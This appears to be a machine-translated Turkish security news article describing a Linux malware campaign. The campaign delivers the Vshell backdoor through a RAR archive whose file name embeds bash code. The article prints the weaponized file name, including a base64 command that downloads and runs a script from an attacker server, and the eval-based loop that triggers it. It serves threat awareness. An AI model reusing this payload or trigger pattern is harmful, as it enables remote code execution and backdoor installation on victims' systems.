Uzun süredir güvenlik burçları olan Linux ortamları, işletim sistemi güvenliği ile ilgili geleneksel varsayımlara meydan okuyan sofistike yeni bir tehditle karşı karşıyadır.
Yakın zamanda keşfedilen bir kötü amaçlı yazılım kampanyası, Vshell arka kapısını sunmak için RAR arşiv dosya adlarını silahlandıran ustaca bir saldırı vektöründen yararlanarak saldırganların komut dosyası ve dosya meta verilerini hedeflemek için geleneksel sömürü tekniklerinin ötesinde nasıl geliştiğini gösteriyor.
Saldırı, bir güzellik ürünü anketi daveti olarak gizlenmiş görünüşte zararsız bir spam e -postasıyla başlar ve kurbanları ikna etmek için küçük bir parasal ödül sunar.
Kimlik bilgisi hırsızlığı veya marka taklit edilmesine odaklanan geleneksel kimlik avı kampanyalarının aksine, bu sosyal mühendislik yaklaşımı, kötü niyetli bir RAR arşivi eki sunarken kullanıcı merakından yararlanır.
Arşiv, ortak kabuk işlemleri tarafından işlendiğinde yürütülmeyi bekleyen, hareketsiz bir yük görevi gören özel hazırlanmış bir dosya adına sahip bir dosya içerir.
Bu saldırıyı özellikle sinsi yapan şey, Linux kabuk komut dosyalarında yaygın olan tehlikeli desenlerden yararlanmasıdır.
Trellix araştırmacıları, kötü amaçlı dosya adının, dizin numaralandırması veya dosya listesi gibi rutin işlemler sırasında kabuk tarafından yorumlandığında komutları yürütmek üzere tasarlanmış gömülü bash uyumlu kod içerdiğini belirledi.
Dosya adının kendisi, genellikle meta verilerden ziyade dosya içeriğine odaklanan geleneksel güvenlik savunmalarını atlayarak bir yük tetikleyici görevi görür.
Silahlı dosya adı, kabuk komut enjeksiyon ilkelerinden yararlanan karmaşık bir yapıyı takip eder.
Çıkarıldığında, arşiv adlı bir dosyayı ortaya çıkarır ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bashözel karakterlerinin komut sözdizimi olarak yorumlanması nedeniyle normal kabuk girişi ile manuel olarak oluşturulamayan.
Bu dosya adı muhtemelen kabuk giriş doğrulamasını atlamak için harici araçlar veya programlama dilleri kullanılarak hazırlanmıştır.
Enfeksiyon mekanizması ve yürütme zinciri
Enfeksiyon, kabuk komut dosyaları kötü amaçlı dosya adını gibi ortak işlemler yoluyla işlediğinde tetiklenir. for f in *; do eval "echo $f"; done.
.webp)
Değerlendirme işlevlerine sahip dosya listeleme işlemleri, değerlendirme parametrelerine sahip komutlar ve kabuk genişlemesi ile işleme dahil olmak üzere çoklu tetikleyici vektörler mevcuttur.
Gömülü yük yükü, dosya adının doğrudan BASH’a borulu bir Base64 kodlu komutu değerlendirdiği çok aşamalı bir yaklaşım kullanır.
Tetiklendikten sonra, ilk aşama, sistem mimarisini algılayan ve x86, x64, kol veya ARM64 sistemleri için uygun ELF ikilisini getiren ikinci aşamalı bir komut dosyasını indirir.
Son yük, VShell, disk tabanlı algılamayı önlemek için FEXECVE () kullanarak tamamen bellekte çalışır ve meşru çekirdek iplikleri gibi maskelenir [kworker/0:2].
Bu sofistike kaçırma tekniği, Linux hedefli kötü amaçlı yazılımların geleneksel güvenlik paradigmalarına meydan okuyan daha gizli, bellekte yerleşik operasyonlara doğru evrimini göstermektedir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.